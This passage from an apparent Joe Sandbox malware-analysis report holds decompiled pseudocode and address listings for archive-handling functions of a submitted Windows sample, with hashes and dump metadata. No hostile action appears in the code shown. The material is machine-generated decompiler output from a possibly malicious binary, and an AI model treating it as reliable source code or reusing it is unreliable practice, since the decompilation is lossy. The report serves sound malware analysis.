				if(_t206 != _t275) {
					 *((intOrPtr*)( *_t206 + 8))(_t206);
					 *(_t331 + 8) = _t275;
				}
				_t207 =  *(_t331 + 0xc);
				if(_t207 != _t275) {
					 *((intOrPtr*)( *_t207 + 8))(_t207);
					 *(_t331 + 0xc) = _t275;
				}
				E00409944(_t331 + 0x10);
				 *(_t331 + 0x1c) =  *(_t331 + 0x1c) | 0xffffffff;
				 *(_t331 + 0xd0) = _t275;
				 *(_t331 + 0xd8) = _t275;
				 *(_t331 + 0xd4) = _t275;
				E0040429A(_t331 + 0x70);
				 *(_t336 - 4) = _t275;
				E0040368D(_t336 - 0x54);
				 *(_t336 - 4) = 1;
				if(E00403A5B(_t336 - 0x60, 0x2e) >= _t275) {
					E0040376E(_t336 - 0x54,  *((intOrPtr*)(_t336 - 0x60)) + 2 + _t211 * 2);
				}
				 *(_t336 - 0x48) = _t275;
				 *(_t336 - 0x44) = _t275;
				 *(_t336 - 0x40) = _t275;
				_t334 =  *(_t336 + 8);
				 *(_t336 - 4) = 2;
				 *(_t336 - 0x14) = _t275;
				_t213 =  *( *_t334 + 0xc);
				if(_t213 != _t275) {
					if(_t213 > 0xffffffff) {
						_t213 = _t213 | 0xffffffff;
					}
					_push(_t213);
					 *(_t336 - 0x14) = E004031DD();
				}
				_t214 = 0;
				 *(_t336 - 4) = 3;
				if( *( *_t334 + 0xc) <= _t275) {
					L14:
					if( *((intOrPtr*)(_t334 + 0x1d)) == _t275) {
						 *((intOrPtr*)(_t336 - 0x34)) = 0x800000;
						 *(_t336 - 0x30) = _t275;
					} else {
						 *((intOrPtr*)(_t336 - 0x34)) =  *((intOrPtr*)(_t334 + 0x20));
						 *(_t336 - 0x30) =  *(_t334 + 0x24);
					}
					_t215 =  *(_t334 + 8);
					 *(_t336 - 0x18) = _t215;
					if(_t215 < _t275) {
						_t216 =  *_t334;
						 *(_t336 - 0x10) = _t275;
						 *(_t336 + 8) = _t275;
						__eflags =  *((intOrPtr*)(_t216 + 0xc)) - _t275;
						if( *((intOrPtr*)(_t216 + 0xc)) <= _t275) {
							L28:
							__eflags =  *((intOrPtr*)(_t334 + 0x30)) - _t275;
							if( *((intOrPtr*)(_t334 + 0x30)) != _t275) {
								L32:
								 *(_t336 - 0x1c) =  *(_t336 - 0x44);
								_t218 =  *(_t336 - 0x10);
								__eflags = _t218 - _t275;
								if(_t218 != _t275) {
									 *(_t336 - 0x1c) = _t218;
								}
								goto L34;
							}
							_t221 = 1;
							__eflags =  *(_t336 - 0x10) - _t221;
							if( *(_t336 - 0x10) == _t221) {
								 *(_t336 - 0x44) = _t221;
								goto L32;
							}
							_t275 = 0x80004001;
							goto L67;
						} else {
							goto L20;
						}
						do {
							L20:
							__eflags =  *((intOrPtr*)(_t331 + 0xdf)) - _t275;
							 *(_t336 - 0x24) =  *( *((intOrPtr*)(_t216 + 8)) +  *(_t336 + 8) * 4);
							if( *((intOrPtr*)(_t331 + 0xdf)) != _t275) {
								L22:
								_t256 = E004032CE( *((intOrPtr*)( *(_t336 - 0x24) + 0xc)), "Split");
								__eflags = _t256;
								if(_t256 != 0) {
									goto L27;
								}
								L23:
								_t257 = E0040B70B( *((intOrPtr*)(_t334 + 0x2c)),  *(_t336 + 8), _t275,  *((intOrPtr*)( *((intOrPtr*)(_t334 + 0x2c)) + 4)));
								__eflags = _t257 - _t275;
								if(_t257 < _t275) {
									_t259 = E00409144( *(_t336 - 0x24), _t336 - 0x54);
									__eflags = _t259;
									if(_t259 < 0) {
										E004088FD(_t336 - 0x48,  *(_t336 + 8));
									} else {
										 *(_t336 - 0x10) =  *(_t336 - 0x10) + 1;
										E0040B406(_t336 - 0x48,  *(_t336 - 0x10),  *(_t336 + 8));
										 *((char*)( *(_t336 + 8) +  *(_t336 - 0x14))) = 1;
									}
								}
								goto L27;
							}
							__eflags =  *((intOrPtr*)(_t334 + 0x19)) - _t275;
							if( *((intOrPtr*)(_t334 + 0x19)) != _t275) {
								goto L23;
							}
							goto L22;
							L27:
							 *(_t336 + 8) =  *(_t336 + 8) + 1;
							_t216 =  *_t334;
							__eflags =  *(_t336 + 8) -  *((intOrPtr*)(_t216 + 0xc));
						} while ( *(_t336 + 8) <  *((intOrPtr*)(_t216 + 0xc)));
						goto L28;
					} else {
						E004088FD(_t336 - 0x48, _t215);
						 *(_t336 - 0x1c) = 1;
						 *((char*)( *(_t336 - 0x18) +  *(_t336 - 0x14))) = 1;
						L34:
						_t219 =  *((intOrPtr*)(_t334 + 0x30));
						 *(_t336 - 0x2c) = _t275;
						 *(_t336 - 0x28) = _t275;
						if(_t219 == _t275) {
							L37:
							 *(_t331 + 0xc0) =  *(_t336 - 0x2c);
							_t221 =  *(_t336 - 0x28);
							 *(_t331 + 0xc4) =  *(_t336 - 0x28);
							if( *((intOrPtr*)(_t334 + 0x19)) == _t275) {
								L65:
								if( *_t331 != _t275) {
									L67:
									E00403204(E00403204(E00403204(E00403204(_t221,  *(_t336 - 0x14)),  *(_t336 - 0x48)),  *((intOrPtr*)(_t336 - 0x54))),  *((intOrPtr*)(_t336 - 0x60)));
									_t226 = _t275;
									L68:
									 *[fs:0x0] =  *((intOrPtr*)(_t336 - 0xc));
									return _t226;
								}
								L66:
								_t275 = 1;
								goto L67;
							}
							_t221 =  *(_t336 - 0x44);
							 *(_t336 - 0x24) =  *(_t336 - 0x44);
							if( *(_t336 - 0x18) >= _t275) {
								_t221 =  *(_t336 - 0x1c);
								 *(_t336 - 0x24) =  *(_t336 - 0x1c);
							}
							 *(_t336 - 0x18) = _t275;
							if( *(_t336 - 0x24) > _t275) {
								do {
									 *(_t331 + 0x94) =  *( *(_t336 - 0x48) +  *(_t336 - 0x18) * 4);
									_t229 =  *((intOrPtr*)(_t334 + 0x38));
									if(_t229 == _t275) {
										L43:
										_t230 =  *((intOrPtr*)(_t334 + 0x30));
										if(_t230 == _t275) {
											L45:
											 *(_t336 - 0x10) = _t275;
											 *(_t336 - 4) = 4;
											_t232 = E00409D49(_t334,  *(_t331 + 0x94), _t336 - 0x10);
											 *(_t336 + 8) = _t232;
											if(_t232 != _t275) {
												_t221 =  *(_t336 - 0x10);
												 *(_t336 - 4) = 3;
												__eflags = _t221 - _t275;
												if(_t221 != _t275) {
													_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
												}
												_t275 =  *(_t336 + 8);
												goto L67;
											}
											_t233 =  *(_t336 - 0x10);
											if(_t233 != _t275) {
												__eflags =  *((intOrPtr*)(_t334 + 0x30)) - _t275;
												if(__eflags == 0) {
													 *(_t336 - 0x20) = _t275;
													 *(_t336 - 4) = 5;
													 *((intOrPtr*)( *_t233))(_t233, 0x41b1c0, _t336 - 0x20);
													_t235 =  *(_t336 - 0x20);
													__eflags = _t235 - _t275;
													if(_t235 == _t275) {
														_t236 =  *(_t336 - 0x10);
														 *(_t336 - 4) = 3;
														__eflags = _t236 - _t275;
														if(_t236 != _t275) {
															_t236 =  *((intOrPtr*)( *_t236 + 8))(_t236);
														}
														E00403204(E00403204(E00403204(E00403204(_t236,  *(_t336 - 0x14)),  *(_t336 - 0x48)),  *((intOrPtr*)(_t336 - 0x54))),  *((intOrPtr*)(_t336 - 0x60)));
														_t226 = 0x80004001;
														goto L68;
													}
													 *(_t336 + 8) =  *((intOrPtr*)( *_t235 + 0xc))(_t235,  *((intOrPtr*)(_t334 + 0x34)));
													_t242 =  *(_t336 - 0x20);
													__eflags = _t242 - _t275;
													 *(_t336 - 4) = 4;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t242 + 8))(_t242);
													}
													L53:
													_t243 = E00409970(_t331, __eflags,  *(_t336 - 0x10), _t275, _t275,  *(_t336 + 8));
													__eflags = _t243 - _t275;
													 *(_t336 - 0x20) = _t243;
													if(_t243 != _t275) {
														_t221 =  *(_t336 - 0x10);
														 *(_t336 - 4) = 3;
														__eflags = _t221 - _t275;
														if(_t221 != _t275) {
															_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
														}
														_t275 =  *(_t336 - 0x20);
														goto L67;
													}
													__eflags =  *(_t336 + 8) - 1;
													if( *(_t336 + 8) != 1) {
														__eflags =  *(_t336 + 8) - _t275;
														if( *(_t336 + 8) == _t275) {
															E004063E5(_t331,  *(_t336 - 0x10));
															_t221 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t221 - _t275;
															if(_t221 != _t275) {
																_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
															}
														} else {
															_t221 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t221 - _t275;
															if(_t221 != _t275) {
																_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
															}
															_t275 =  *(_t336 + 8);
														}
														goto L67;
													}
													__eflags =  *((intOrPtr*)(_t331 + 0x13)) - _t275;
													if( *((intOrPtr*)(_t331 + 0x13)) == _t275) {
														L57:
														 *(_t336 + 0xb) = _t275;
														L58:
														__eflags =  *(_t336 - 0x18) - _t275;
														if( *(_t336 - 0x18) != _t275) {
															L62:
															_t245 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t245 - _t275;
															if(_t245 != _t275) {
																 *((intOrPtr*)( *_t245 + 8))(_t245);
															}
															goto L64;
														}
														__eflags =  *(_t336 - 0x1c) - 1;
														if( *(_t336 - 0x1c) != 1) {
															goto L62;
														}
														 *(_t331 + 0x1c) =  *(_t331 + 0x94);
														E0040A26D(_t331 + 0x40, _t331 + 0x10);
														__eflags =  *((intOrPtr*)(_t334 + 0x1a)) - _t275;
														if( *((intOrPtr*)(_t334 + 0x1a)) != _t275) {
															goto L62;
														}
														__eflags =  *(_t336 + 0xb) - _t275;
														if( *(_t336 + 0xb) != _t275) {
															_t221 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t221 - _t275;
															if(_t221 != _t275) {
																_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
															}
															goto L66;
														}
														goto L62;
													}
													__eflags =  *(_t331 + 0x14) & 0x00000001;
													 *(_t336 + 0xb) = 1;
													if(( *(_t331 + 0x14) & 0x00000001) == 0) {
														goto L58;
													}
													goto L57;
												}
												 *((intOrPtr*)(_t336 - 0x3c)) =  *((intOrPtr*)(_t336 - 0x34));
												 *(_t336 - 0x38) =  *(_t336 - 0x30);
												 *(_t336 + 8) =  *((intOrPtr*)( *_t233 + 0xc))(_t233,  *((intOrPtr*)(_t334 + 0x30)), _t336 - 0x3c,  *((intOrPtr*)(_t334 + 0x38)));
												goto L53;
											}
											 *(_t336 - 4) = 3;
											goto L64;
										}
										_t221 =  *((intOrPtr*)( *_t230 + 0x10))(_t230, _t275, _t275, _t275, _t275);
										if(_t221 != _t275) {
											L69:
											_t275 = _t221;
											goto L67;
										}
										goto L45;
									}
									_t221 =  *((intOrPtr*)( *_t229 + 0xc))(_t229, _t275, _t336 - 0x2c);
									if(_t221 != _t275) {
										goto L69;
									}
									goto L43;
									L64:
									 *(_t336 - 0x18) =  *(_t336 - 0x18) + 1;
									_t221 =  *(_t336 - 0x18);
								} while ( *(_t336 - 0x18) <  *(_t336 - 0x24));
							}
							goto L65;
						}
						_t221 =  *((intOrPtr*)( *_t219 + 0x10))(_t219, _t275, _t275, 2, _t336 - 0x2c);
						if(_t221 != _t275) {
							goto L69;
						}
						_t252 =  *((intOrPtr*)(_t334 + 0x30));
						_t221 =  *((intOrPtr*)( *_t252 + 0x10))(_t252, _t275, _t275, _t275, _t275);
						if(_t221 != _t275) {
							goto L69;
						}
						goto L37;
					}
				} else {
					goto L13;
				}
				do {
					L13:
					 *(_t214 +  *(_t336 - 0x14)) = _t275;
					_t214 = _t214 + 1;
				} while (_t214 <  *( *_t334 + 0xc));
				goto L14;
			}






























                                                                                                                            0x00409db2
                                                                                                                            0x00409dbd
                                                                                                                            0x00409dbf
                                                                                                                            0x00409dc1
                                                                                                                            0x00409dc5
                                                                                                                            0x00409dca
                                                                                                                            0x00409dcd
                                                                                                                            0x00409dcd
                                                                                                                            0x00409dcf
                                                                                                                            0x00409dd4
                                                                                                                            0x00409dd9
                                                                                                                            0x00409ddc
                                                                                                                            0x00409ddc
                                                                                                                            0x00409ddf
                                                                                                                            0x00409de4
                                                                                                                            0x00409de9
                                                                                                                            0x00409dec
                                                                                                                            0x00409dec
                                                                                                                            0x00409df2
                                                                                                                            0x00409df7
                                                                                                                            0x00409dfb
                                                                                                                            0x00409e07
                                                                                                                            0x00409e0d
                                                                                                                            0x00409e13
                                                                                                                            0x00409e1b
                                                                                                                            0x00409e1e
                                                                                                                            0x00409e28
                                                                                                                            0x00409e33
                                                                                                                            0x00409e40
                                                                                                                            0x00409e40
                                                                                                                            0x00409e45
                                                                                                                            0x00409e48
                                                                                                                            0x00409e4b
                                                                                                                            0x00409e4e
                                                                                                                            0x00409e51
                                                                                                                            0x00409e55
                                                                                                                            0x00409e5a
                                                                                                                            0x00409e5f
                                                                                                                            0x00409e64
                                                                                                                            0x00409e66
                                                                                                                            0x00409e66
                                                                                                                            0x00409e69
                                                                                                                            0x00409e70
                                                                                                                            0x00409e70
                                                                                                                            0x00409e75
                                                                                                                            0x00409e77
                                                                                                                            0x00409e7e
                                                                                                                            0x00409e8e
                                                                                                                            0x00409e91
                                                                                                                            0x00409ea1
                                                                                                                            0x00409ea8
                                                                                                                            0x00409e93
                                                                                                                            0x00409e96
                                                                                                                            0x00409e9c
                                                                                                                            0x00409e9c
                                                                                                                            0x00409eab
                                                                                                                            0x00409eb0
                                                                                                                            0x00409eb3
                                                                                                                            0x00409ed4
                                                                                                                            0x00409ed6
                                                                                                                            0x00409ed9
                                                                                                                            0x00409edc
                                                                                                                            0x00409edf
                                                                                                                            0x00409f6f
                                                                                                                            0x00409f6f
                                                                                                                            0x00409f72
                                                                                                                            0x00409f89
                                                                                                                            0x00409f8c
                                                                                                                            0x00409f8f
                                                                                                                            0x00409f92
                                                                                                                            0x00409f94
                                                                                                                            0x00409f96
                                                                                                                            0x00409f96
                                                                                                                            0x00000000
                                                                                                                            0x00409f94
                                                                                                                            0x00409f76
                                                                                                                            0x00409f77
                                                                                                                            0x00409f7a
                                                                                                                            0x00409f86
                                                                                                                            0x00000000
                                                                                                                            0x00409f86
                                                                                                                            0x00409f7c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409ee5
                                                                                                                            0x00409ee5
                                                                                                                            0x00409eeb
                                                                                                                            0x00409ef4
                                                                                                                            0x00409ef7
                                                                                                                            0x00409efe
                                                                                                                            0x00409f09
                                                                                                                            0x00409f0e
                                                                                                                            0x00409f10
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409f12
                                                                                                                            0x00409f1c
                                                                                                                            0x00409f21
                                                                                                                            0x00409f23
                                                                                                                            0x00409f2c
                                                                                                                            0x00409f31
                                                                                                                            0x00409f33
                                                                                                                            0x00409f59
                                                                                                                            0x00409f35
                                                                                                                            0x00409f3b
                                                                                                                            0x00409f42
                                                                                                                            0x00409f4d
                                                                                                                            0x00409f4d
                                                                                                                            0x00409f33
                                                                                                                            0x00000000
                                                                                                                            0x00409f23
                                                                                                                            0x00409ef9
                                                                                                                            0x00409efc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409f5e
                                                                                                                            0x00409f5e
                                                                                                                            0x00409f61
                                                                                                                            0x00409f66
                                                                                                                            0x00409f66
                                                                                                                            0x00000000
                                                                                                                            0x00409eb5
                                                                                                                            0x00409eb9
                                                                                                                            0x00409ec4
                                                                                                                            0x00409ecb
                                                                                                                            0x00409f99
                                                                                                                            0x00409f99
                                                                                                                            0x00409f9c
                                                                                                                            0x00409fa1
                                                                                                                            0x00409fa4
                                                                                                                            0x00409fd1
                                                                                                                            0x00409fd4
                                                                                                                            0x00409fda
                                                                                                                            0x00409fdd
                                                                                                                            0x00409fe6
                                                                                                                            0x0040a166
                                                                                                                            0x0040a168
                                                                                                                            0x0040a16d
                                                                                                                            0x0040a188
                                                                                                                            0x0040a190
                                                                                                                            0x0040a192
                                                                                                                            0x0040a198
                                                                                                                            0x0040a1a0
                                                                                                                            0x0040a1a0
                                                                                                                            0x0040a16a
                                                                                                                            0x0040a16c
                                                                                                                            0x00000000
                                                                                                                            0x0040a16c
                                                                                                                            0x00409fec
                                                                                                                            0x00409ff2
                                                                                                                            0x00409ff5
                                                                                                                            0x00409ff7
                                                                                                                            0x00409ffa
                                                                                                                            0x00409ffa
                                                                                                                            0x0040a000
                                                                                                                            0x0040a003
                                                                                                                            0x0040a009
                                                                                                                            0x0040a012
                                                                                                                            0x0040a018
                                                                                                                            0x0040a01d
                                                                                                                            0x0040a032
                                                                                                                            0x0040a032
                                                                                                                            0x0040a037
                                                                                                                            0x0040a04b
                                                                                                                            0x0040a04b
                                                                                                                            0x0040a054
                                                                                                                            0x0040a05f
                                                                                                                            0x0040a066
                                                                                                                            0x0040a069
                                                                                                                            0x0040a1a7
                                                                                                                            0x0040a1aa
                                                                                                                            0x0040a1ae
                                                                                                                            0x0040a1b0
                                                                                                                            0x0040a1b5
                                                                                                                            0x0040a1b5
                                                                                                                            0x0040a1b8
                                                                                                                            0x00000000
                                                                                                                            0x0040a1b8
                                                                                                                            0x0040a06f
                                                                                                                            0x0040a074
                                                                                                                            0x0040a07f
                                                                                                                            0x0040a082
                                                                                                                            0x0040a0a5
                                                                                                                            0x0040a0b4
                                                                                                                            0x0040a0b8
                                                                                                                            0x0040a0ba
                                                                                                                            0x0040a0bd
                                                                                                                            0x0040a0bf
                                                                                                                            0x0040a1bd
                                                                                                                            0x0040a1c0
                                                                                                                            0x0040a1c4
                                                                                                                            0x0040a1c6
                                                                                                                            0x0040a1cb
                                                                                                                            0x0040a1cb
                                                                                                                            0x0040a1e9
                                                                                                                            0x0040a1f1
                                                                                                                            0x00000000
                                                                                                                            0x0040a1f1
                                                                                                                            0x0040a0ce
                                                                                                                            0x0040a0d1
                                                                                                                            0x0040a0d4
                                                                                                                            0x0040a0d6
                                                                                                                            0x0040a0da
                                                                                                                            0x0040a0df
                                                                                                                            0x0040a0df
                                                                                                                            0x0040a0e2
                                                                                                                            0x0040a0ec
                                                                                                                            0x0040a0f1
                                                                                                                            0x0040a0f3
                                                                                                                            0x0040a0f6
                                                                                                                            0x0040a1f8
                                                                                                                            0x0040a1fb
                                                                                                                            0x0040a1ff
                                                                                                                            0x0040a201
                                                                                                                            0x0040a206
                                                                                                                            0x0040a206
                                                                                                                            0x0040a209
                                                                                                                            0x00000000
                                                                                                                            0x0040a209
                                                                                                                            0x0040a0fc
                                                                                                                            0x0040a100
                                                                                                                            0x0040a22b
                                                                                                                            0x0040a22e
                                                                                                                            0x0040a24e
                                                                                                                            0x0040a253
                                                                                                                            0x0040a256
                                                                                                                            0x0040a25a
                                                                                                                            0x0040a25c
                                                                                                                            0x0040a265
                                                                                                                            0x0040a265
                                                                                                                            0x0040a230
                                                                                                                            0x0040a230
                                                                                                                            0x0040a233
                                                                                                                            0x0040a237
                                                                                                                            0x0040a239
                                                                                                                            0x0040a23e
                                                                                                                            0x0040a23e
                                                                                                                            0x0040a241
                                                                                                                            0x0040a241
                                                                                                                            0x00000000
                                                                                                                            0x0040a22e
                                                                                                                            0x0040a106
                                                                                                                            0x0040a109
                                                                                                                            0x0040a115
                                                                                                                            0x0040a115
                                                                                                                            0x0040a118
                                                                                                                            0x0040a118
                                                                                                                            0x0040a11b
                                                                                                                            0x0040a146
                                                                                                                            0x0040a146
                                                                                                                            0x0040a149
                                                                                                                            0x0040a14d
                                                                                                                            0x0040a14f
                                                                                                                            0x0040a154
                                                                                                                            0x0040a154
                                                                                                                            0x00000000
                                                                                                                            0x0040a14f
                                                                                                                            0x0040a11d
                                                                                                                            0x0040a121
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a12c
                                                                                                                            0x0040a133
                                                                                                                            0x0040a138
                                                                                                                            0x0040a13b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a13d
                                                                                                                            0x0040a140
                                                                                                                            0x0040a211
                                                                                                                            0x0040a214
                                                                                                                            0x0040a218
                                                                                                                            0x0040a21a
                                                                                                                            0x0040a223
                                                                                                                            0x0040a223
                                                                                                                            0x00000000
                                                                                                                            0x0040a21a
                                                                                                                            0x00000000
                                                                                                                            0x0040a140
                                                                                                                            0x0040a10b
                                                                                                                            0x0040a10f
                                                                                                                            0x0040a113
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a113
                                                                                                                            0x0040a08d
                                                                                                                            0x0040a097
                                                                                                                            0x0040a0a0
                                                                                                                            0x00000000
                                                                                                                            0x0040a0a0
                                                                                                                            0x0040a076
                                                                                                                            0x00000000
                                                                                                                            0x0040a076
                                                                                                                            0x0040a040
                                                                                                                            0x0040a045
                                                                                                                            0x0040a1a3
                                                                                                                            0x0040a1a3
                                                                                                                            0x00000000
                                                                                                                            0x0040a1a3
                                                                                                                            0x00000000
                                                                                                                            0x0040a045
                                                                                                                            0x0040a027
                                                                                                                            0x0040a02c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a157
                                                                                                                            0x0040a157
                                                                                                                            0x0040a15a
                                                                                                                            0x0040a15d
                                                                                                                            0x0040a009
                                                                                                                            0x00000000
                                                                                                                            0x0040a003
                                                                                                                            0x00409fb1
                                                                                                                            0x00409fb6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409fbc
                                                                                                                            0x00409fc6
                                                                                                                            0x00409fcb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409fcb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409e80
                                                                                                                            0x00409e80
                                                                                                                            0x00409e83
                                                                                                                            0x00409e88
                                                                                                                            0x00409e89
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID: Split
                                                                                                                            • API String ID: 3519838083-1882502421
                                                                                                                            • Opcode ID: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
                                                                                                                            • Instruction ID: 09c5a0370ad5ed14047af77479f4839a91d55b5c5a0b00876ef22aa24b9ab58f
                                                                                                                            • Opcode Fuzzy Hash: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
                                                                                                                            • Instruction Fuzzy Hash: 98022A70A00249EFCB10DFA5C8849AEBBB5BF48304F14847EE516EB392C739AE55CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026C1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E004026C1(intOrPtr* __ecx, void* __eflags) {
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t87;
				void* _t89;
				intOrPtr* _t93;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t146;
				intOrPtr* _t147;
				intOrPtr* _t150;
				void* _t152;
				void* _t159;

				_t159 = __eflags;
				E00418D80(E004195EF, _t152);
				_t150 = __ecx;
				E00404D7D(_t152 - 0x74);
				E0040368D(_t152 - 0x4c);
				_t146 = __ecx + 4;
				 *((intOrPtr*)(_t152 - 4)) = 0;
				_t72 = E00404DAF(_t152 - 0x74, _t159,  *((intOrPtr*)(__ecx + 4))); // executed
				if(_t72 != 0) {
					E0040E83C(_t152 - 0x30);
					 *((intOrPtr*)(_t152 - 0x24)) = 0;
					 *((intOrPtr*)(_t152 - 0x20)) = 0;
					 *((intOrPtr*)(_t152 - 0x1c)) = 0;
					 *((char*)(_t152 - 4)) = 2;
					E004028C3(_t152 - 0xc4);
					 *((intOrPtr*)(_t152 - 0xc4)) =  *_t150;
					 *((intOrPtr*)(_t152 - 0x9c)) = _t152 - 0x30;
					 *((char*)(_t152 - 4)) = 3;
					 *((intOrPtr*)(_t152 - 0x98)) = _t152 - 0x24;
					E004037D2(_t152 - 0x80, _t146);
					_t79 =  *((intOrPtr*)(_t150 + 0x1c));
					__eflags = _t79;
					if(_t79 == 0) {
						_t80 = 0;
						__eflags = 0;
					} else {
						_t80 = _t79 + 4;
					}
					_push(_t80);
					_t147 = _t150 + 0x28;
					_push(_t152 - 0xc4); // executed
					_t82 = E0040AFA7(_t147); // executed
					__eflags = _t82;
					 *((intOrPtr*)(_t150 + 0x88)) = _t82;
					if(__eflags == 0) {
						E00403740(_t152 - 0x18, __eflags, _t150 + 0x10);
						 *((char*)(_t152 - 4)) = 4;
						E004055BC(_t152 - 0x18);
						_t86 = E0040448C( *((intOrPtr*)(_t152 - 0x18)), __eflags); // executed
						__eflags = _t86;
						if(_t86 != 0) {
							_t87 = E004036F3(_t152 - 0x3c, "Default");
							 *((char*)(_t152 - 4)) = 6;
							_t89 = E00401D71( *((intOrPtr*)(_t150 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *_t147 +  *(_t147 + 4) * 4 - 4)))), _t152 - 0x18, _t87, _t152 - 0x5c, 0);
							 *((char*)(_t152 - 4)) = 4;
							E00403204(_t89,  *((intOrPtr*)(_t152 - 0x3c)));
							_t93 =  *((intOrPtr*)( *((intOrPtr*)( *_t147 +  *(_t147 + 4) * 4 - 4))));
							 *((intOrPtr*)(_t150 + 0x88)) =  *((intOrPtr*)( *_t93 + 0x1c))(_t93, 0, 0xffffffff, 0,  *((intOrPtr*)(_t150 + 0x20)));
							E00403204(E00403204(E00403204(_t94,  *((intOrPtr*)(_t152 - 0x18))),  *((intOrPtr*)(_t152 - 0x80))),  *((intOrPtr*)(_t152 - 0x24)));
						} else {
							_push(_t152 - 0x18);
							_t101 = E0040B7FD(_t152 - 0x3c);
							 *((char*)(_t152 - 4)) = 5;
							_t103 = E00403204(E004037D2(_t150 + 0x8c, _t101),  *((intOrPtr*)(_t152 - 0x3c)));
							 *((intOrPtr*)(_t150 + 0x88)) = 0x80004005;
							E00403204(E00403204(E00403204(_t103,  *((intOrPtr*)(_t152 - 0x18))),  *((intOrPtr*)(_t152 - 0x80))),  *((intOrPtr*)(_t152 - 0x24)));
						}
					} else {
						E00403204(E00403204(E004038D0(_t150 + 0x8c,  *0x41b620),  *((intOrPtr*)(_t152 - 0x80))),  *((intOrPtr*)(_t152 - 0x24)));
					}
					 *((char*)(_t152 - 4)) = 0;
					_t98 = E00402F4A(_t152 - 0x30);
				} else {
					_t98 = E004038D0(__ecx + 0x8c,  *0x41b61c);
					 *((intOrPtr*)(__ecx + 0x88)) = 0x80004005;
				}
				_t99 = E00403204(_t98,  *((intOrPtr*)(_t152 - 0x4c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t152 - 0xc));
				return _t99;
			}




















                                                                                                                            0x004026c1
                                                                                                                            0x004026c6
                                                                                                                            0x004026d3
                                                                                                                            0x004026d9
                                                                                                                            0x004026e1
                                                                                                                            0x004026e9
                                                                                                                            0x004026f1
                                                                                                                            0x004026f4
                                                                                                                            0x004026fb
                                                                                                                            0x00402720
                                                                                                                            0x00402725
                                                                                                                            0x00402728
                                                                                                                            0x0040272b
                                                                                                                            0x00402734
                                                                                                                            0x00402738
                                                                                                                            0x00402740
                                                                                                                            0x00402749
                                                                                                                            0x00402755
                                                                                                                            0x00402759
                                                                                                                            0x0040275f
                                                                                                                            0x00402764
                                                                                                                            0x00402767
                                                                                                                            0x00402769
                                                                                                                            0x00402770
                                                                                                                            0x00402770
                                                                                                                            0x0040276b
                                                                                                                            0x0040276b
                                                                                                                            0x0040276b
                                                                                                                            0x00402772
                                                                                                                            0x00402773
                                                                                                                            0x0040277e
                                                                                                                            0x0040277f
                                                                                                                            0x00402784
                                                                                                                            0x00402786
                                                                                                                            0x0040278c
                                                                                                                            0x004027bd
                                                                                                                            0x004027c5
                                                                                                                            0x004027c9
                                                                                                                            0x004027d1
                                                                                                                            0x004027d6
                                                                                                                            0x004027d8
                                                                                                                            0x00402832
                                                                                                                            0x0040283d
                                                                                                                            0x00402854
                                                                                                                            0x0040285c
                                                                                                                            0x00402860
                                                                                                                            0x00402874
                                                                                                                            0x00402882
                                                                                                                            0x00402898
                                                                                                                            0x004027da
                                                                                                                            0x004027e2
                                                                                                                            0x004027e6
                                                                                                                            0x004027f2
                                                                                                                            0x004027fe
                                                                                                                            0x00402806
                                                                                                                            0x00402820
                                                                                                                            0x00402825
                                                                                                                            0x0040278e
                                                                                                                            0x004027aa
                                                                                                                            0x004027b0
                                                                                                                            0x004028a3
                                                                                                                            0x004028a6
                                                                                                                            0x004026fd
